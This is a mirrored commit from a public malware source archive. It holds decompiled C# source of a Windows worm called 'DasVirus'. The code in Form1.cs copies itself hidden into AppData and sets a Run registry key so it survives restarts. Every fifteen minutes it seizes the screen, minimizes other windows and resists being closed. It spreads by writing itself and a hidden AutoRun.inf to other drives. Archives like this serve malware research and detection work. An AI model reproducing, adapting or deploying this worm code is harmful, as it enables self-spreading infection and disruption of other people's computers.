daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCopyright("Copyright © HACK-Design 2008")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("DasVirus")]
[assembly: AssemblyCompany("HACK-Design")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("DasVirus Beta1")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.0.0.1")]
[assembly: Guid("b8e3b262-c1c6-4285-b226-e406b73e84b2")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Form1.cs
+360
View File
@@ -0,0 +1,360 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.Form1
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using DasVirus.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace DasVirus
{
[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("Timer1")]
private Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private Timer _Timer2;
[AccessedThroughProperty("Timer3")]
private Timer _Timer3;
[AccessedThroughProperty("Timer4")]
private Timer _Timer4;
private Point lPoint;
private Point nPoint;
private Rectangle Scr;
private Graphics Graph;
private bool OpStatus;
private int PID;
private Pen MyPen;
[SpecialName]
private int \u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks;
[DebuggerNonUserCode]
static Form1()
{
}
[DebuggerNonUserCode]
public Form1()
{
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
this.KeyDown += new KeyEventHandler(this.Form1_KeyDown);
this.Load += new EventHandler(this.Form1_Load);
lock (Form1.__ENCList)
Form1.__ENCList.Add(new WeakReference((object) this));
this.InitializeComponent();
}
[STAThread]
public static void Main() => Application.Run((Form) MyProject.Forms.Form1);
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.Timer1 = new Timer(this.components);
this.Timer2 = new Timer(this.components);
this.Timer3 = new Timer(this.components);
this.Timer4 = new Timer(this.components);
this.SuspendLayout();
this.Timer1.Interval = 50;
this.Timer2.Interval = 2000;
this.Timer3.Interval = 1000;
this.Timer4.Interval = 15000;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 273);
this.ControlBox = false;
this.DoubleBuffered = true;
this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Text = "DasVirus";
this.TopMost = true;
this.TransparencyKey = SystemColors.Control;
this.ResumeLayout(false);
}
internal virtual Timer Timer1
{
[DebuggerNonUserCode] get => this._Timer1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual Timer Timer2
{
[DebuggerNonUserCode] get => this._Timer2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual Timer Timer3
{
[DebuggerNonUserCode] get => this._Timer3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer3_Tick);
if (this._Timer3 != null)
this._Timer3.Tick -= eventHandler;
this._Timer3 = value;
if (this._Timer3 == null)
return;
this._Timer3.Tick += eventHandler;
}
}
internal virtual Timer Timer4
{
[DebuggerNonUserCode] get => this._Timer4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
if (this._Timer4 != null)
this._Timer4.Tick -= eventHandler;
this._Timer4 = value;
if (this._Timer4 == null)
return;
this._Timer4.Tick += eventHandler;
}
}
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern bool IsWindowVisible(IntPtr hWnd);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern bool ShowWindow(IntPtr hWnd, Form1.nCS_Commands nCmdShow);
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
if (!this.OpStatus)
return;
e.Cancel = true;
}
private void Form1_KeyDown(object sender, KeyEventArgs e)
{
e.SuppressKeyPress = true;
if ((e.Modifiers & Keys.Control) == 0 || e.KeyCode != Keys.C)
return;
this.OpStatus = false;
ProjectData.EndApp();
}
private void Form1_Load(object sender, EventArgs e)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (Operators.CompareString(MyProject.Application.Info.DirectoryPath.ToLower(), folderPath.ToLower(), false) != 0)
{
Process.Start("explorer.exe", MyProject.Application.Info.DirectoryPath);
if (Process.GetProcessesByName("dasvirus").Length > 1)
ProjectData.EndApp();
this.CopyMeHidden(folderPath + "\\DasVirus.exe");
MyProject.Computer.Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("DasVirus Startup", (object) (folderPath + "\\DasVirus.exe"));
Process.Start(folderPath + "\\DasVirus.exe");
ProjectData.EndApp();
}
VBMath.Randomize();
this.Timer3.Start();
this.Timer4.Start();
}
public Point GenPoint()
{
Point point;
point.X = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Width)));
point.Y = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Height)));
return point;
}
private void Timer3_Tick(object sender, EventArgs e)
{
if (!(MyProject.Computer.Clock.LocalTime.Second == 0 & MyProject.Computer.Clock.LocalTime.Minute % 15 == 0))
return;
this.InitZlovred();
}
public void InitZlovred()
{
this.Opacity = 1.0;
this.Scr = Screen.PrimaryScreen.Bounds;
this.SetBounds(-3, -13, checked (this.Scr.Width + 6), checked (this.Scr.Height + 25));
this.Region = new Region(new Rectangle(3, 18, this.Scr.Width, this.Scr.Height));
this.lPoint = this.GenPoint();
this.Graph = this.CreateGraphics();
this.OpStatus = false;
this.PID = Process.GetCurrentProcess().Id;
this.MyPen = Pens.Black;
this.Timer1.Start();
this.Timer2.Start();
}
private void Timer1_Tick(object sender, EventArgs e)
{
checked { ++this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks; }
if (this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks > 100)
{
this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks = 0;
this.MyPen = new Pen(Color.FromArgb(checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue)))));
}
this.nPoint = this.GenPoint();
this.Graph.DrawLine(this.MyPen, this.lPoint, this.nPoint);
this.Graph.DrawString("DasVirus 1.0 beta 1 by HD", new Font("Verdana", 20f, FontStyle.Regular), Brushes.YellowGreen, 20f, 20f);
this.lPoint = this.nPoint;
Interaction.AppActivate(this.PID);
}
private void Timer2_Tick(object sender, EventArgs e)
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (processes[index].MainWindowHandle != this.Handle && Operators.CompareString(processes[index].ProcessName.ToLower(), "explorer", false) != 0 && Form1.IsWindowVisible(processes[index].MainWindowHandle))
Form1.ShowWindow(processes[index].MainWindowHandle, Form1.nCS_Commands.SW_MINIMIZE);
checked { ++index; }
}
}
private void Timer4_Tick(object sender, EventArgs e)
{
DriveInfo[] drives = DriveInfo.GetDrives();
int num = checked (drives.Length - 1);
int index = 0;
while (index <= num)
{
if (Strings.Asc(Strings.Left(drives[index].Name, 1)) > 66)
{
this.CopyMeHidden(drives[index].Name + "DasVirus.exe");
try
{
File.SetAttributes(drives[index].Name + "AutoRun.inf", FileAttributes.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
StreamWriter streamWriter = new StreamWriter(drives[index].Name + "AutoRun.inf", false);
streamWriter.Write("[AutoRun]\r\nShellExecute=DasVirus.exe");
streamWriter.Flush();
streamWriter.Close();
streamWriter.Dispose();
try
{
File.SetAttributes(drives[index].Name + "autorun.inf", FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
public void CopyMeHidden(string DestPath)
{
try
{
File.SetAttributes(DestPath, FileAttributes.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(MyProject.Application.Info.DirectoryPath + "\\DasVirus.exe", DestPath, true);
try
{
File.SetAttributes(DestPath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public enum nCS_Commands
{
SW_HIDE = 0,
SW_NORMAL = 1,
SW_SHOWNORMAL = 1,
SW_SHOWMINIMIZED = 2,
SW_MAXIMIZE = 3,
SW_SHOWMAXIMIZED = 3,
SW_SHOWNOACTIVATE = 4,
SW_SHOW = 5,
SW_MINIMIZE = 6,
SW_SHOWMINNOACTIVE = 7,
SW_SHOWNA = 8,
SW_RESTORE = 9,
SW_MAX = 10, // 0x0000000A
SW_SHOWDEFAULT = 10, // 0x0000000A
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Form1.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/InternalXmlHelper.cs
+177
View File
@@ -0,0 +1,177 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.InternalXmlHelper
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Xml.Linq;
namespace DasVirus.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class InternalXmlHelper
{
[EditorBrowsable(EditorBrowsableState.Never)]
private InternalXmlHelper()
{
}
public static string get_Value(IEnumerable<XElement> source)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (enumerator.MoveNext())
return enumerator.Current.Value;
}
finally
{
enumerator?.Dispose();
}
return (string) null;
}
public static void set_Value(IEnumerable<XElement> source, string value)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (!enumerator.MoveNext())
return;
enumerator.Current.Value = value;
}
finally
{
enumerator?.Dispose();
}
}
public static string get_AttributeValue(IEnumerable<XElement> source, XName name)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (enumerator.MoveNext())
return (string) enumerator.Current.Attribute(name);
}
finally
{
enumerator?.Dispose();
}
return (string) null;
}
public static void set_AttributeValue(IEnumerable<XElement> source, XName name, string value)
{
IEnumerator<XElement> enumerator;
try
{
enumerator = source.GetEnumerator();
if (!enumerator.MoveNext())
return;
enumerator.Current.SetAttributeValue(name, (object) value);
}
finally
{
enumerator?.Dispose();
}
}
public static string get_AttributeValue(XElement source, XName name) => (string) source.Attribute(name);
public static void set_AttributeValue(XElement source, XName name, string value) => source.SetAttributeValue(name, (object) value);
[EditorBrowsable(EditorBrowsableState.Never)]
public static XAttribute CreateAttribute(XName name, object value) => value == null ? (XAttribute) null : new XAttribute(name, RuntimeHelpers.GetObjectValue(value));
[EditorBrowsable(EditorBrowsableState.Never)]
public static XAttribute CreateNamespaceAttribute(XName name, XNamespace ns)
{
XAttribute namespaceAttribute = new XAttribute(name, (object) ns.NamespaceName);
namespaceAttribute.AddAnnotation((object) ns);
return namespaceAttribute;
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static object RemoveNamespaceAttributes(XNamespace[] ns, object obj)
{
if (ns != null && obj != null)
{
switch (obj)
{
case XElement e:
// ISSUE: reference to a compiler-generated method
return (object) InternalXmlHelper.RemoveNamespaceAttributes(ns, e);
case IEnumerable enumerable:
// ISSUE: reference to a compiler-generated method
return (object) InternalXmlHelper.RemoveNamespaceAttributes(ns, enumerable);
}
}
return obj;
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static IEnumerable RemoveNamespaceAttributes(XNamespace[] ns, IEnumerable obj)
{
if (ns == null || obj == null)
return obj;
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
// ISSUE: object of a compiler-generated type is created
// ISSUE: reference to a compiler-generated method
return obj is IEnumerable<XElement> source ? (IEnumerable) source.Select<XElement, XElement>(new Func<XElement, XElement>(new InternalXmlHelper.RemoveNamespaceAttributesClosure(ns).ProcessXElement)) : (IEnumerable) obj.Cast<object>().Select<object, object>(new Func<object, object>(new InternalXmlHelper.RemoveNamespaceAttributesClosure(ns).ProcessObject));
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static XElement RemoveNamespaceAttributes(XNamespace[] ns, XElement e)
{
XAttribute nextAttribute;
if (ns != null && e != null)
{
for (XAttribute xattribute = e.FirstAttribute; xattribute != null; xattribute = nextAttribute)
{
nextAttribute = xattribute.NextAttribute;
if (xattribute.IsNamespaceDeclaration)
{
XNamespace xnamespace = xattribute.Annotation<XNamespace>();
if ((object) xnamespace != null)
{
int num = checked (ns.Length - 1);
int index = 0;
while (index <= num)
{
if (xnamespace == ns[index])
{
xattribute.Remove();
break;
}
checked { ++index; }
}
}
}
}
}
return e;
}
[EditorBrowsable(EditorBrowsableState.Never)]
public static XNamespace GetNamespace(ref XNamespace xns, string ns)
{
if ((object) xns == null)
xns = XNamespace.Get(ns);
return xns;
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/MyApplication.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.MyApplication
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace DasVirus.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.MyComputer
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace DasVirus.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.MyProject
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace DasVirus.My
{
[StandardModule]
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/My/MySettings.cs
+36
View File
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: DasVirus.My.MySettings
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace DasVirus.My
{
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}
